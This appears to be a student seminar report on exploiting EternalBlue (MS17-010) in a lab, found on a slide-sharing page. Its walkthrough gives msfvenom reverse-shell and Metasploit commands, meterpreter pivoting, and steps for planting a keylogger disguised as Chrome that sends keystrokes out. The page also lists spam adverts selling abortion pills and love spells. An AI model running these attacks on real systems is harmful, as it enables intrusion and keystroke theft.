%+27788225528 love spells in Boston Psychic Readings, Attraction spells,Bring...%+27788225528 love spells in Boston Psychic Readings, Attraction spells,Bring...
%+27788225528 love spells in Boston Psychic Readings, Attraction spells,Bring...
masabamasaba
 

Recently uploaded (20)

%in Bahrain+277-882-255-28 abortion pills for sale in Bahrain
%in Bahrain+277-882-255-28 abortion pills for sale in Bahrain%in Bahrain+277-882-255-28 abortion pills for sale in Bahrain
%in Bahrain+277-882-255-28 abortion pills for sale in Bahrain
 
%in Soweto+277-882-255-28 abortion pills for sale in soweto
%in Soweto+277-882-255-28 abortion pills for sale in soweto%in Soweto+277-882-255-28 abortion pills for sale in soweto
%in Soweto+277-882-255-28 abortion pills for sale in soweto
 
%in Hazyview+277-882-255-28 abortion pills for sale in Hazyview
%in Hazyview+277-882-255-28 abortion pills for sale in Hazyview%in Hazyview+277-882-255-28 abortion pills for sale in Hazyview
%in Hazyview+277-882-255-28 abortion pills for sale in Hazyview
 
Direct Style Effect Systems - The Print[A] Example - A Comprehension Aid
Direct Style Effect Systems - The Print[A] Example - A Comprehension AidDirect Style Effect Systems - The Print[A] Example - A Comprehension Aid
Direct Style Effect Systems - The Print[A] Example - A Comprehension Aid
 
%in Rustenburg+277-882-255-28 abortion pills for sale in Rustenburg
%in Rustenburg+277-882-255-28 abortion pills for sale in Rustenburg%in Rustenburg+277-882-255-28 abortion pills for sale in Rustenburg
%in Rustenburg+277-882-255-28 abortion pills for sale in Rustenburg
 
WSO2CON 2024 - WSO2's Digital Transformation Journey with Choreo: A Platforml...
WSO2CON 2024 - WSO2's Digital Transformation Journey with Choreo: A Platforml...WSO2CON 2024 - WSO2's Digital Transformation Journey with Choreo: A Platforml...
WSO2CON 2024 - WSO2's Digital Transformation Journey with Choreo: A Platforml...
 
WSO2CON 2024 - Cloud Native Middleware: Domain-Driven Design, Cell-Based Arch...
WSO2CON 2024 - Cloud Native Middleware: Domain-Driven Design, Cell-Based Arch...WSO2CON 2024 - Cloud Native Middleware: Domain-Driven Design, Cell-Based Arch...
WSO2CON 2024 - Cloud Native Middleware: Domain-Driven Design, Cell-Based Arch...
 
%in Midrand+277-882-255-28 abortion pills for sale in midrand
%in Midrand+277-882-255-28 abortion pills for sale in midrand%in Midrand+277-882-255-28 abortion pills for sale in midrand
%in Midrand+277-882-255-28 abortion pills for sale in midrand
 
WSO2Con2024 - WSO2's IAM Vision: Identity-Led Digital Transformation
WSO2Con2024 - WSO2's IAM Vision: Identity-Led Digital TransformationWSO2Con2024 - WSO2's IAM Vision: Identity-Led Digital Transformation
WSO2Con2024 - WSO2's IAM Vision: Identity-Led Digital Transformation
 
Artyushina_Guest lecture_YorkU CS May 2024.pptx
Artyushina_Guest lecture_YorkU CS May 2024.pptxArtyushina_Guest lecture_YorkU CS May 2024.pptx
Artyushina_Guest lecture_YorkU CS May 2024.pptx
 
Love witchcraft +27768521739 Binding love spell in Sandy Springs, GA |psychic...
Love witchcraft +27768521739 Binding love spell in Sandy Springs, GA |psychic...Love witchcraft +27768521739 Binding love spell in Sandy Springs, GA |psychic...
Love witchcraft +27768521739 Binding love spell in Sandy Springs, GA |psychic...
 
%+27788225528 love spells in Huntington Beach Psychic Readings, Attraction sp...
%+27788225528 love spells in Huntington Beach Psychic Readings, Attraction sp...%+27788225528 love spells in Huntington Beach Psychic Readings, Attraction sp...
%+27788225528 love spells in Huntington Beach Psychic Readings, Attraction sp...
 
%in kempton park+277-882-255-28 abortion pills for sale in kempton park
%in kempton park+277-882-255-28 abortion pills for sale in kempton park %in kempton park+277-882-255-28 abortion pills for sale in kempton park
%in kempton park+277-882-255-28 abortion pills for sale in kempton park
 
Announcing Codolex 2.0 from GDK Software
Announcing Codolex 2.0 from GDK SoftwareAnnouncing Codolex 2.0 from GDK Software
Announcing Codolex 2.0 from GDK Software
 
WSO2CON 2024 - Does Open Source Still Matter?
WSO2CON 2024 - Does Open Source Still Matter?WSO2CON 2024 - Does Open Source Still Matter?
WSO2CON 2024 - Does Open Source Still Matter?
 
WSO2Con2024 - From Code To Cloud: Fast Track Your Cloud Native Journey with C...
WSO2Con2024 - From Code To Cloud: Fast Track Your Cloud Native Journey with C...WSO2Con2024 - From Code To Cloud: Fast Track Your Cloud Native Journey with C...
WSO2Con2024 - From Code To Cloud: Fast Track Your Cloud Native Journey with C...
 
%in tembisa+277-882-255-28 abortion pills for sale in tembisa
%in tembisa+277-882-255-28 abortion pills for sale in tembisa%in tembisa+277-882-255-28 abortion pills for sale in tembisa
%in tembisa+277-882-255-28 abortion pills for sale in tembisa
 
%+27788225528 love spells in Knoxville Psychic Readings, Attraction spells,Br...
%+27788225528 love spells in Knoxville Psychic Readings, Attraction spells,Br...%+27788225528 love spells in Knoxville Psychic Readings, Attraction spells,Br...
%+27788225528 love spells in Knoxville Psychic Readings, Attraction spells,Br...
 
%in tembisa+277-882-255-28 abortion pills for sale in tembisa
%in tembisa+277-882-255-28 abortion pills for sale in tembisa%in tembisa+277-882-255-28 abortion pills for sale in tembisa
%in tembisa+277-882-255-28 abortion pills for sale in tembisa
 
%+27788225528 love spells in Boston Psychic Readings, Attraction spells,Bring...
%+27788225528 love spells in Boston Psychic Readings, Attraction spells,Bring...%+27788225528 love spells in Boston Psychic Readings, Attraction spells,Bring...
%+27788225528 love spells in Boston Psychic Readings, Attraction spells,Bring...
 

The EternalBlue Exploit: how it works and affects systems

  • 1. Seminars in Advanced Topics in Engineering in Computer Science - The EternalBlue Exploit: how it works and affects systems Andrea Bissoli - 1543640 November 15, 2017 Abstract The purpose of this report is to focus on one particular aspect of a WannayCry malware in order to understand which vulnerability it ex- ploited and how it is spread into the internet. In the report it will be shown EternalBlue attack and how it is possible to take the pc control thanks to DoublePulsar attack and Meterpreter session. Than it is shown a study case in which it is performed a pivoting attack. In the end it is injected simple keyloggers in the machines attacked in order to take some useful informations. 1 Introduction Before to start with implementation, code and technical terms we have to un- derstand the political scene and the events happened during last year. 1.1 Scenario explanation In the following bullet there are summarized the events happened during last year. This give us a complete picture of the situation, and it is easy to under- stand the choices did by each party of the game [11] [10] [7] [1]: • August 2016: The Shadow Brokers, a mysterious online hackers group, claimed to have infiltrated the Equation Group, an elite hacking unit linked to the National Security Agency. It released a few taster files and images of the cache. The leak, announced in broken English by the group in a series of posts on Twitter, Tumblr, Pastebin and Github, was ac- companied by claims that the group was in possession of state-sponsored cyber weapons. Zero-day presented in the released archieve is of the old Cisco, than the Shadow Brokers launched an auction to sell the archive to the highest bidder. 1
  • 2. • December 2016: In December the Shadow Brokers deleted auction and offered direct sales. • January 2017: No one bought the Shadow Brokers’ archive. They de- cided to show lost Equation Group 2013 Windows Ops Disk screenshots . The Shadow Brokers knew if they released these information the vulnera- bilities should be reported by the Equation Group to Microsoft and they should be patched. • February 2017: Microsoft missed to make patches for EternalBlue at- tack. • March 2017: Microsoft released path for SMB vulnerability to prevent EternalBlue attack. Also Oracle patched some vulnerabilities. • April 2017: Having failed to make their price, the Shadow Brokers re- leased the password for the encrypted archive. In mid-April of 2017, the Shadow Brokers dumped a cache they claimed belonged to the NSA, and an assortment of sophisticated network exploitation tools was instantly available for anyone to reverse engineering and use. For a brief moment in time, many researchers felt like kids in a candy store. It quickly became apparent that the exploits were antiques and had all been patched, or were for ancient systems. So the defenders moved on, the attackers did not move on; they realized that even though the defenders thought the systems were safe against these non-zero-day, unexciting attacks, we were not. The fact is that Eternal exploits was not zero-day vulnerability, because Microsoft patched it 30 days before the actual release, the problem was that not all systems in the word did a last updating. • May 2017: Thanks to mid-April release WannaCry is launched. • June 2017: In June, The Shadow Brokers announced ”The Shadow Bro- kers Data Dump of the Month” service. They launched a new monthly subscription model. Each month peoples can pay membership fee, then the club’s members get data dump for each month. Monthly Data Dump could be: web browser, router, handset exploits and tools, select items from newer Ops Disks, including newer exploits for Windows 10, compromised network data from more SWIFT providers and Central banks,compromised network data from Russian, Chinese, Iranian, or North Korean nukes and missile programs. In the end, Rapid7 studied to determine what hosts on the public IPv4 Internet are exposing SMB endpoints and to attempt to gather publicly available information from them. They scanned 139/TCP and 445/TCP ports (the SMB ones). They found over 4 million hosts with one or both of the SMB ports open, as seen in the following figure: 2
  • 3. 1.2 WannaCry explanation and MS17-010 vulnerability WannaCry is composed by two modules: ransomware and worm. A ransomware is a malicious software [9] which covertly encrypts your files, preventing you from accessing them, then demands payment for their safe recovery. WannaCry ransomware deviates from the traditional ransomware definition by including a component that is able to find vulnerable systems on a local network and spread that way as well. This type of malicious software behaviour is called a worm. EternalBlue [8] is a worm used by WannaCry and it can spread from device to device on a network via port 445, thanks to the SMB vulnerability. While Microsoft patched it with update MS17-010[5], many computers have not been updated and remain vulnerable. EternalBlue exploits a vulnerability in Microsoft’s implementation of the Server Message Block (SMB) protocol. This vulnerability is denoted by entry CVE- 2017-0144 in the Common Vulnerabilities and Exposures (CVE) catalog. The vulnerability exists because the SMB version 1 (SMBv1) server in various ver- sions of Microsoft Windows mishandles specially crafted packets from remote attackers, allowing them to execute arbitrary code on the target com- puter. SMB is a network file sharing protocol that allows applications on a computer to read and write (in)to files and request services from server programs in a com- puter network. It is basically the default way computers are remotely managed in any environment, so a vulnerability in it has a huge impact. 3
  • 4. 2 Setting up the practical scenario Now we are going to see the study case taken in consideration. First of all it will be seen how the networks is made, which O.S. is running on each computer and how to install secondary tools. It will be exposed the attack vector, that is the steps done to reach the goal and in the end the implementations of two keyloggers. 2.1 Environment setting In our environment there are three computers: • Kali Linux as attack machine running Fuzzbunch and metasploit frame- work. IP: 191.168.1.164 • Windows 7 64-bit as pivot vulnerable host with two adapters. IP: 10.10.10.134 and 191.168.1.134 • Windows 7 64-bit as target vulnerable host. IP: 10.10.10.175 In the following picture it get see a graphic representation: Kali Linux setting In the Kali Linux machine we have to install two tools: Fuzzbunch metasploit and Metasploit framework. One of the elements in the ShadowBrokers data dump is Fuzzbunch. Fuzzbunch 4
  • 5. can be compared to MetaSploit but it is written in Python instead of Ruby. It’s an easy to use framework for the operator in order to launch exploits and interact with the implants. The FuzzBunch framework contains several ready to use exploits, each for specific types of targets. Thanks to this guide[4] it can be possible to install Fuzzbunch on Kali Linux. Regarding Metasploit framework it is installed yet. Windows 7 64-bit setting Regarding Windows 7 computers it is not necessary to install anything. 2.2 Attack vector The implemented attack vector is the following: 1. Take control of the pivot machine thanks Eternalblue and DoublePulsar attack. 2. Upload the keylogger into pivot machine. 3. Through pivot machine take target machine control. This is made thanks to port forwarding and proxy into pivot machine. 4. Upload the keylogger into target machine. Keylogger is made in such a way to put it into browser folder, rename it with the browser name, and when the victim launches browser it launches keylogger, than it starts the actual browser. Every time then the keylogger goes up it sends the log file to a remote server. It does an HTTP POST, since in c++ it is difficult do an HTTP POST, I did it with four lines in python and then with a tool it is transformed in a executable file. Hence, inside the keylogger is called this module to send keystrokes to the server. 2.3 Keylogger: theory and implementation Keylogging, often referred to as Keyboard Capturing or Keystroke logging, is the action of recording or monitoring every key pressed on a keyboard[2]. There are several basic technologies which can be used to intercept keystrokes and mouse events, and many keyloggers use these technologies [3]. The main idea behind keyloggers is to get in between any two links in the chain of events between when a key is pressed and when information about that keystroke is displayed on the monitor. This can be achieved using video surveillance, a hardware bug in the keyboard, wiring or the computer itself, intercepting input/ output, substituting the keyboard driver, the filter driver in the keyboard stack, intercepting kernel functions by any means possible (sub- stituting addresses in system tables, splicing function code, etc.), intercepting DLL functions in user mode, and, finally, requesting information from the key- board using standard documented methods. 5
  • 6. The most common methods used to construct keylogging software are the fol- lowing: • a system hook which intercepts notification that a key has been pressed (installed using WinAPI SetWindowsHook for messages sent by the window procedure. It is most often written in C); So for the first part we hook the keyboard input in order to get it too: Then, in the handlekeys function implements the keylogging logic, this means get keystrokes and save into log file. • a cyclical information keyboard request from the keyboard (using WinAPI Get(Async)KeyState or GetKeyboardState most often written in Visual Basic, sometimes in Borland Delphi); For this type of keylogger the main part is the following: • using a filter driver (requires specialized knowledge and is written in C). 6
  • 7. 3 The practical case Now, we will see how the attack is implemented. So for the first part it is shown the first hop attack, than the more interesting one, so how to pivoting the first machine [6]. 3.1 First hop The target of this attack is the first computer, that is the pivot machine. 3.1.1 Open Fuzzbuch and launch Eternalblue attack Open Fuzzbuch through this command: #!/bin/bash export WINEPREFIX= $HOME/.wine-fuzzbunch cd $HOME/.wine-fuzzbunch/drive c/fuzzbunch-debian/windows wine cmd.exe python fb.py 7
  • 8. and set Default Target IP (pivot’s IP) and Default Callback IP Address (at- tacker’s IP) as followspoint: Now we can use a Eternalblue moduel attack, so type: use eternalblue Most of the settings are defaults, but be careful when it comes time to define the delivery mechanism. Be sure to select ”Traditional deployment from within FUZZBUNCH” here: At this point we are ready to run the exploit. If everything is setup correctly you should see WIN when the exploit is successful. It may take more than one try, but be persistent if you are sure the host is vulnerable: 8
  • 9. 3.1.2 Build dll to inject Once the Eternalblue exploit is succesful, the next step is to use the Doublepul- sar module to inject a DLL of our choosing into a process on the victim. In this case we will run a DLL that contains a meterpreter payload to establish a reverse shell back to our attacker machine. To generate the payload we will use msfvenom and to make things easier we will generate the payload in the directory that fuzzbunch is launched from: cd $HOME/.wine-fuzzbunch/drive c/fuzzbunch-debian/windows msfvenom -p windows/x64/meterpreter/reverse tcp lhost=192.168.1.164 lport=45467 - platform windows -f dll -o file.dll 9
  • 10. 3.1.3 Prepare Metasploit framework We also need to prepare Metasploit to receive the connection from the new victim once the DLL is injected by using exploit/multi/handler, making sure the payload, lport and lhost match our msfvenom command from the previous step. So the commands are: masfconsole use exploit/multi/handler set payload windows/x64/meterpreter/reverse tcp set LHOST 192.168.1.164 set LPORT 45467 run and in the end we will have: 3.1.4 Run DoublePulsar attack The next step is to run DoublePulsar and inject the malicious launcher.dll file. Type the following command in Fuzzbunch to use DoublePulsar: use doublepular In our private practice lab we are targeting a 64-bit vulnerable Windows 7 installation. In this case we need to change the default settings for the architec- ture to 64 bit and keep all other variables default until we reach the Function settings. 10
  • 11. Instead of the default option for the Function variable we choose to inject and run a DLL. You have probably guessed already that we are injecting the malicious DLL that we have generated with Empire earlier. Choose option 2 from the function settings. Then we need to enter the location of the DLL file and some other options we can leave as default. Choose the default options for all other variable settings until Fuzzbunch asks us if we want to execute DoublePulsar. If all was successful the output should look like: 3.1.5 Wait and use meterpreter When we switch to the handler listener we should have a reverse shell from the pivot host which we can no interact with: 11
  • 12. 3.2 Second hop Once the pivot hosts externally facing service is compromised and a meterpreter shell is achieved, we want to reach internal network in order to compromise also others computers. 3.2.1 Set pivoting To reach out target we need to configure portfwd to relay traffic to internal hosts. The command in this case would be: portfwd add -l 9000 -p 445 -r 10.10.10.183 The breakdown of the command is like this: • -l 9000 : The port that will receive the traffic on the attacker host • -p 445 : The port on the internal victim that will be accessed • -r 10.10.10.183 : The internal victim, that is our target Once the the portfwd is established, the attacker machine is listening on port 9000 and anything sent to that port will reach the internal victim on the defined destination port (445). 3.2.2 Open Fuzzbuch and launch Eternalblue attack Like above, open Fuzzbuch through this command: #!/bin/bash export WINEPREFIX= $HOME/.wine-fuzzbunch cd $HOME/.wine-fuzzbunch/drive c/fuzzbunch-debian/windows wine cmd.exe python fb.py 12
  • 13. and set Default Target IP (pivot’s IP) and Default Callback IP Address (at- tacker’s IP). Now, the Default Target IP will be 127.0.0.1 because all traffic for target will pass through attacker localhost. 13
  • 14. Now we can use a Eternalblue moduel attack, so type: use eternalblue Most of the settings are defaults, but be careful when it comes time to define the target port. In this case we have to use the local port defined in the portfwd command, 9000, as Eternalblue will default to 445. Hit enter at the Prompt for Variable Settings prompt to enter the new target port: The next setting that will deviate from the defaults is the delivery mech- anism. Be sure to select Traditional deployment from within FUZZBUNCH here: 14
  • 15. At this point were ready to run the exploit. If everything is setup correctly you should see WIN when the exploit is successful. It may take more than one try, but be persistent if youre sure the host is vulnerable: 15
  • 16. 3.2.3 Build dll to inject Once the Eternalblue exploit is succesful, the next step is to use the Doublepul- sar module to inject a DLL of our choosing into a process on the victim. In this case we will run a DLL that contains a meterpreter payload to establish a reverse shell back to our attacker machine. To generate the payload we will use msfvenom and to make things easier we will generate the payload in the directory that fuzzbunch is launched from: cd $HOME/.wine-fuzzbunch/drive c/fuzzbunch-debian/windows msfvenom -p windows/x64/meterpreter/reverse tcp lhost=192.168.1.164 lport=9000 - platform windows -f dll -o file2.dll 3.2.4 Prepare Metasploit framework We also need to prepare Metasploit to receive the connection from the new victim once the DLL is injected by using exploit/multi/handler, in this case we don’t have match with the above options (lport,lhost) because the informations flow from target to pivot and from pivot to attacker. Hence we have to set a port set in the netsh command above. So the commands are: masfconsole use exploit/multi/handler set payload windows/x64/meterpreter/reverse tcp set LHOST 192.168.1.164 set LPORT 9000 run and in the end we will have: 3.2.5 Run DoublePulsar attack Next, from fuzzbunch run ”use doublepulsar”. Be sure that the target port matches (9000 in this case). Once configured, it should look something like this: 16
  • 17. If all was successful the output should look like: 3.2.6 Wait and use meterpreter When we switch to the handler listener we should have a reverse shell from the target host which we can no interact with: 17
  • 18. 3.3 Keylogger injection In order to put the keylogger inside the machines we have to follow these com- mands. The goal is to upload into the browser directory the malicious files. One is the actual keylogger, the other one is the send data module. In the end we will have an actual browser renamed with browser olde.exe and the malicious one will be browser.exe and send data.exe. shell cd C:”Program Files (x86)”GoogleChromeApplication rename chrome.exe chrome old.exe upload /root/Desktop/send data.exe C:”Program Files (x86)” GoogleChromeApplication upload /root/Desktop/send data.exe C: ”Program Files (x86)” Google ChromeApplication Now, we have to wait that user opens the browser and keylogger sends statistics to the server. 4 Conclusions We have seen how Fuzzbunch wiht EternalBlue and Doublepulsar is a strong and powerful metasploit framwork. Furthermore we have seen how to perfom pivoting with these tools. How we can see it easy enters in a computer has this vulnerability, and also it enters in the internal networks. This bug was patched but today 4 millions public IPs are still vulnerable, so they can be attacked. Moreover if an attacker is able to enter in a company computer with other techniques (such as phishing etc..), and if the internal network corporation cannot upload its internal pc, the malicious person can enter with technique seen above. 18
  • 19. References [1] Rebekah Brown. The Shadow Brokers Leaked Exploits Explained. Ed. by rapid7. url: https://blog.rapid7.com/2017/04/18/the-shadow- brokers-leaked-exploits-faq/ (visited on 2017). [2] Nikolay Grebennikov. Keyloggers: How they work and how to detect them. Ed. by AO Kaspersky Lab. url: https://securelist.com/analysis/ publications / 36138 / keyloggers - how - they - work - and - how - to - detect-them-part-1/ (visited on 2007). [3] Nikolay Grebennikov. Keyloggers: Implementing keyloggers in Windows. Part Two. Ed. by AO Kaspersky Lab. url: https://securelist.com/ analysis/publications/36358/keyloggers-implementing-keyloggers- in-windows-part-two/ (visited on 2011). [4] mdiazcl. Kali/fuzzbunch-debian deployment guide. url: https://github. com/mdiazcl/fuzzbunch-debian (visited on 2017). [5] Microsoft. Microsoft Security Bulletin MS17-010 - Critical. Ed. by Mi- crosoft. url: https : / / technet . microsoft . com / en - us / library / security/ms17-010.aspx (visited on 2017). [6] Joe Norton. Running Fuzzbunch on Kali Through a Meterpreter Port For- ward. url: https://medium.com/@joe_norton/running-eternalblue- on-kali-through-a-meterpreter-port-forward-edd877dfd724 (vis- ited on 2017). [7] Jon Hart Dustin Myers Vasudha Shivamoggi Philip Thomsen Rebekah Brown Bob Rudis. 2017 Q2 RAPID7 QUARTERLY THREAT REPORT. Ed. by rapid7. url: https://information.rapid7.com/rs/411-NAK- 970/images/rapid7-2017Q2-threat-report.pdf (visited on 2017). [8] Tom Reeve. WannaCry not first to exploit NSA EternalBlue, DoublePul- sar malware. Ed. by scmagazineuk. url: https://www.scmagazineuk. com/wannacry-not-first-to-exploit-nsa-eternalblue-doublepulsar- malware/article/661887/ (visited on 2017). [9] boB Rudis. Wanna Decryptor (WNCRY) Ransomware Explained. Ed. by rapid7. url: https : / / blog . rapid7 . com / 2017 / 05 / 12 / wanna - decryptor-wncry-ransomware-explained/ (visited on 2017). [10] theguardian. Hacking group auctions ’cyber weapons’ stolen from NSA. Ed. by theguardian. url: https://www.theguardian.com/technology/ 2016/aug/16/shadow-brokers-hack-auction-nsa-malware-equation- group (visited on 2016). [11] theshadowbrokers. OH LORDY! Comey Wanna Cry Edition. Ed. by steemit. url: https://steemit.com/shadowbrokers/@theshadowbrokers/oh- lordy-comey-wanna-cry-edition (visited on 2017). 19